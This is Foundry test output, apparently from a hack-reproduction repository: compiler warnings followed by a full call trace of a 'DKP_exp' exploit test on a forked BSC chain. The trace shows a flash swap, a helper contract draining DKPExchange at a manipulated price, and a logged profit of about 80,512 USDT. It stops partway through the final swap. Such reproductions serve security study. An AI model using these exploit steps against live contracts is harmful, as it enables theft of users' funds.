Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-03/DKP_exp.sol:25:5:
   |
25 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-03/DKP_exp.sol:83:5:
   |
83 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/DKP_exp.sol:56:26:
   |
56 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/DKP_exp.sol:56:42:
   |
56 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/DKP_exp.sol:56:59:
   |
56 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                           ^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 726.62ms (2.08ms CPU time)

Ran 1 test for src/test/2023-03/DKP_exp.sol:ContractTest
[PASS] testExploit() (gas: 775963)
Logs:
  Attacker USDT balance after exploit: 80512.615981085813934882

Traces:
  [20773] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 26284131 [2.628e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19], "DKP")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDT: [0x55d398326f99059fF775485246999027B3197955], "USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], "Pair")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683], "DKPExchange")
    │   └─ ← [Return]
    └─ ← [Stop]

  [932063] ContractTest::testExploit()
    ├─ [2531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(USDT: [0x55d398326f99059fF775485246999027B3197955])
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: USDT: [0x55d398326f99059fF775485246999027B3197955], slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: USDT: [0x55d398326f99059fF775485246999027B3197955], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(USDT: [0x55d398326f99059fF775485246999027B3197955], 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x00000000000000000000000000000000000000000000002b5e3af16b18800000)
    │   └─ ← [Return]
    ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 800000000000000000000 [8e20]
    ├─ [2531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   └─ ← [Return] 259605445236391899433885 [2.596e23]
    ├─ [500455] Pair::swap(259397760880202785914337 [2.593e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000000036edfb15544e2da27de1)
    │   ├─ [6071] USDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 259397760880202785914337 [2.593e23])
    │   │   ├─ emit Transfer(from: Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 259397760880202785914337 [2.593e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000002b5e3af16b18800000 → 0x000000000000000000000000000000000000000000003719595045b946227de1
    │   │   │   @ 0x139c2d117d88cd530083ac1f85e15fbe50ca7509120bdf9690ce9a1c419bc781: 0x0000000000000000000000000000000000000000000036f93d4861e687720b9d → 0x00000000000000000000000000000000000000000000000b42330d9859cf8dbc
    │   │   └─ ← [Return] true
    │   ├─ [457043] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 259397760880202785914337 [2.593e23], 0, 0x0000000000000000000000000000000000000000000036edfb15544e2da27de1)
    │   │   ├─ [25171] USDT::transfer(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], 100000000000000000000 [1e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], value: 100000000000000000000 [1e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000003719595045b946227de1 → 0x000000000000000000000000000000000000000000003713ed88e78be3127de1
    │   │   │   │   @ 0xfc650bd4b946db075b042156ad963bda8b9b3e9e6e831b905f84450fad43a6f3: 0 → 0x0000000000000000000000000000000000000000000000056bc75e2d63100000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [390008] → new ExchangeDKP@0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635
    │   │   │   ├─ [24562] USDT::approve(DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], spender: DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5694fea24e80c81f89815b3ca1579d33d7db2f5ae6e1fc6728a3e3a842485635: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [226407] DKPExchange::exchange(100000000000000000000 [1e20])
    │   │   │   │   ├─ [10834] USDT::transferFrom(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], 0xb6DF24432F42faF15D921C6578666621baf28F63, 100000000000000000000 [1e20])
    │   │   │   │   │   ├─ emit Transfer(from: ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], to: 0xb6DF24432F42faF15D921C6578666621baf28F63, value: 100000000000000000000 [1e20])
    │   │   │   │   │   ├─ emit Approval(owner: ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], spender: DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683], value: 115792089237316195423570985008687907853269984665640564039357584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x27522b75f514e4d14164805ef708db7f2f4f76cfb1df0df18ae726b267a6928d: 0x00000000000000000000000000000000000000000000008848c23041d4080000 → 0x00000000000000000000000000000000000000000000008db4898e6f37180000
    │   │   │   │   │   │   @ 0x5694fea24e80c81f89815b3ca1579d33d7db2f5ae6e1fc6728a3e3a842485635: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffa9438a1d29cefffff
    │   │   │   │   │   │   @ 0xfc650bd4b946db075b042156ad963bda8b9b3e9e6e831b905f84450fad43a6f3: 0x0000000000000000000000000000000000000000000000056bc75e2d63100000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [7810] 0xB8951382f3418A8aAB5acE71DB5692Eed8B1f073::lastUserInfo(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [2952] DKP::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 36873976322434846364457 [3.687e22]
    │   │   │   │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 207684356189113519548 [2.076e20]
    │   │   │   │   ├─ [86362] DKP::transfer(0x21539bBBC0D948ec7E54F173E2F666A57ca7924f, 88774082456307127939 [8.877e19])
    │   │   │   │   │   ├─ [465] Pair::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] USDT: [0x55d398326f99059fF775485246999027B3197955]
    │   │   │   │   │   ├─ [397] Pair::token1() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19]
    │   │   │   │   │   ├─ [893] Pair::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 259605445236391899433885 [2.596e23], 36873976322434846364457 [3.687e22], 1678262268 [1.678e9]
    │   │   │   │   │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 207684356189113519548 [2.076e20]
    │   │   │   │   │   ├─ [2439] Pair::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 97597498194969607267275 [9.759e22]
    │   │   │   │   │   ├─ emit Transfer(from: DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683], to: 0x21539bBBC0D948ec7E54F173E2F666A57ca7924f, value: 88774082456307127939 [8.877e19])
    │   │   │   │   │   ├─ [2537] Pair::balanceOf(0x6B80C7bE9F1d6Cef13119AE7BDcfe94Bf2A03238) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 68040736000000000010000 [6.804e22]
    │   │   │   │   │   ├─ [2537] Pair::balanceOf(0x681b1AbFf18bE931B86B779466238f2Ae9b2D24D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 193860859007259235 [1.938e17]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 34: 0x000000000000000000000000681b1abff18be931b86b779466238f2ae9b2d24d → 0x00000000000000000000000021539bbbc0d948ec7e54f173e2f666a57ca7924f
    │   │   │   │   │   │   @ 0x212f50926575a46bf59b0e82e743ee007b268cb5e90c041fafff8b2299cf7784: 0x000000000000000000000000000000000000000000000000b092510cf94d7ce3 → 0x000000000000000000000000000000000000000000000005808f36b30eb9d366
    │   │   │   │   │   │   @ 0x46974178f9fea825c5c09776da64f0fabf8d51448438590f9414fef9badfded5: 0x0000000000000000000000000000000000000000000003ca6fd56bc61d422e4f → 0x0000000000000000000000000000000000000000000003c59fd8862007d5d7cc
    │   │   │   │   │   │   @ 33: 0x00000000000000000000006b80c7be9f1d6cef13119ae7bdcfe94bf2a0323801 → 0x000000000000000000000089257a52ad585aacb1137fcc8abbd03a963b968301
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [57042] DKP::transfer(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], 17666042408805118459861 [1.766e22])
    │   │   │   │   │   ├─ [465] Pair::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] USDT: [0x55d398326f99059fF775485246999027B3197955]
    │   │   │   │   │   ├─ [397] Pair::token1() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19]
    │   │   │   │   │   ├─ [893] Pair::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 259605445236391899433885 [2.596e23], 36873976322434846364457 [3.687e22], 1678262268 [1.678e9]
    │   │   │   │   │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 207684356189113519548 [2.076e20]
    │   │   │   │   │   ├─ [439] Pair::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 97597498194969607267275 [9.759e22]
    │   │   │   │   │   ├─ emit Transfer(from: DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683], to: ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], value: 17666042408805118459861 [1.766e22])
    │   │   │   │   │   ├─ [2537] Pair::balanceOf(DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [2537] Pair::balanceOf(0x21539bBBC0D948ec7E54F173E2F666A57ca7924f) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfc650bd4b946db075b042156ad963bda8b9b3e9e6e831b905f84450fad43a6f3: 0 → 0x0000000000000000000000000000000000000000000003bdad96841aa7373fd5
    │   │   │   │   │   │   @ 0x46974178f9fea825c5c09776da64f0fabf8d51448438590f9414fef9badfded5: 0x0000000000000000000000000000000000000000000003c59fd8862007d5d7cc → 0x000000000000000000000000000000000000000000000007f2420205609e97f7
    │   │   │   │   │   │   @ 34: 0x00000000000000000000000021539bbbc0d948ec7e54f173e2f666a57ca7924f → 0x000000000000000000000000f3f67841cdc3ba3b8c2b88e15f931546d360a635
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf514502e4ad3217b16323f02b8cdefb41f67e2c68405388446f47a8f0598d849: 0 → 0x0000000000000000000000000000000000000000000000056bc75e2d63100000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [952] DKP::balanceOf(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635]) [staticcall]
    │   │   │   │   └─ ← [Return] 17666042408805118459861 [1.766e22]
    │   │   │   ├─ [53042] DKP::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 17666042408805118459861 [1.766e22])
    │   │   │   │   ├─ [465] Pair::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] USDT: [0x55d398326f99059fF775485246999027B3197955]
    │   │   │   │   ├─ [397] Pair::token1() [staticcall]
    │   │   │   │   │   └─ ← [Return] DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19]
    │   │   │   │   ├─ [893] Pair::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 259605445236391899433885 [2.596e23], 36873976322434846364457 [3.687e22], 1678262268 [1.678e9]
    │   │   │   │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 207684356189113519548 [2.076e20]
    │   │   │   │   ├─ [439] Pair::totalSupply() [staticcall]
    │   │   │   │   │   └─ ← [Return] 97597498194969607267275 [9.759e22]
    │   │   │   │   ├─ emit Transfer(from: ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 17666042408805118459861 [1.766e22])
    │   │   │   │   ├─ [537] Pair::balanceOf(DKPExchange: [0x89257A52Ad585Aacb1137fCc8abbD03a963B9683]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2537] Pair::balanceOf(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xfc650bd4b946db075b042156ad963bda8b9b3e9e6e831b905f84450fad43a6f3: 0x0000000000000000000000000000000000000000000003bdad96841aa7373fd5 → 0
    │   │   │   │   │   @ 33: 0x000000000000000000000089257a52ad585aacb1137fcc8abbd03a963b968301 → 0x0000000000000000000000f3f67841cdc3ba3b8c2b88e15f931546d360a63501
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000003bdad96841aa7373fd5
    │   │   │   │   │   @ 34: 0x000000000000000000000000f3f67841cdc3ba3b8c2b88e15f931546d360a635 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 1: 0 → 0x000000000000000000000000d06fa1ba7c80f8e113c2dc669a23a9524775cf19
    │   │   │   │   @ 2: 0 → 0x00000000000000000000000089257a52ad585aacb1137fcc8abbd03a963b9683
    │   │   │   │   @ 0x5694fea24e80c81f89815b3ca1579d33d7db2f5ae6e1fc6728a3e3a842485635: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   │   │   @ 34: 0x00000000000000000000000021539bbbc0d948ec7e54f173e2f666a57ca7924f → 0x000000000000000000000000f3f67841cdc3ba3b8c2b88e15f931546d360a635
    │   │   │   └─ ← [Return] 62 bytes of code
    │   │   ├─ [3271] USDT::transfer(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], 260047880581656928235924 [2.6e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], value: 260047880581656928235924 [2.6e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x139c2d117d88cd530083ac1f85e15fbe50ca7509120bdf9690ce9a1c419bc781: 0x00000000000000000000000000000000000000000000000b42330d9859cf8dbc → 0x00000000000000000000000000000000000000000000371c7b8189e4289a3f50
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000003713ed88e78be3127de1 → 0x000000000000000000000000000000000000000000000002b43a6b401447cc4d
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   └─ ← [Return] 260255564937846041755472 [2.602e23]
    │   ├─ [952] DKP::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   └─ ← [Return] 36873976322434846364457 [3.687e22]
    │   ├─ emit Sync(reserve0: 260255564937846041755472 [2.602e23], reserve1: 36873976322434846364457 [3.687e22])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 260047880581656928235924 [2.6e23], amount1In: 0, amount0Out: 259397760880202785914337 [2.593e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x64083ffc0000000007cef138128e0dc713290000000036f93d4861e687720b9d → 0x6408608e0000000007cef138128e0dc7132900000000371c7b8189e4289a3f50
    │   │   @ 10: 0x00000000000000000000000000000029b8d933a9978d63d589fe2ca11a07602f → 0x0000000000000000000000000000002a9e27952a7be7eba272c44a6ceb0b3d43
    │   │   @ 9: 0x00000000000000000000000000000000f853f103bbd7951c826e40024c112a65 → 0x00000000000000000000000000000000fcf4423cf21174c2071d6260ce866361
    │   └─ ← [Stop]
    ├─ [25317] DKP::approve(Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [952] DKP::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 17666042408805118459861 [1.766e22]
    ├─ [103496] Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(17666042408805118459861 [1.766e22], 0, [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1678270606 [1.678e9])
    │   ├─ [74615] DKP::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], 17666042408805118459861 [1.766e22])
    │   │   ├─ [465] Pair::token0() [staticcall]
    │   │   │   └─ ← [Return] USDT: [0x55d398326f99059fF775485246999027B3197955]
    │   │   ├─ [397] Pair::token1() [staticcall]
    │   │   │   └─ ← [Return] DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19]
    │   │   ├─ [893] Pair::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 260255564937846041755472 [2.602e23], 36873976322434846364457 [3.687e22], 1678270606 [1.678e9]
    │   │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   └─ ← [Return] 260255564937846041755472 [2.602e23]
    │   │   ├─ [439] Pair::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 97597498194969607267275 [9.759e22]
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], value: 16782740288364862536868 [1.678e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19], value: 353320848176102369197 [3.533e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19], value: 353320848176102369197 [3.533e20])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DKP: [0xd06fa1BA7c80F8e113c2dc669A23A9524775cF19], value: 176660424088051184598 [1.766e20])
    │   │   ├─ [537] Pair::balanceOf(ExchangeDKP: [0xf3F67841cdC3Ba3B8c2B88E15F931546D360A635]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2537] Pair::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564021791541599108011180074 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x139c2d117d88cd530083ac1f85e15fbe50ca7509120bdf9690ce9a1c419bc781: 0x0000000000000000000000000000000000000000000007cef138128e0dc71329 → 0x000000000000000000000000000000000000000000000b5cbc87100dc63b8fcd
    │   │   │   @ 32: 0x0000000000000000000000000000000000000000000000007096a2a3877e9948 → 0x00000000000000000000000000000000000000000000001397e67214b3cc80f5
    │   │   │   @ 29: 0x0000000000000000000000000000000000000000000000008584aa026286cb8f → 0x00000000000000000000000000000000000000000000000a192c91baf8adbf65
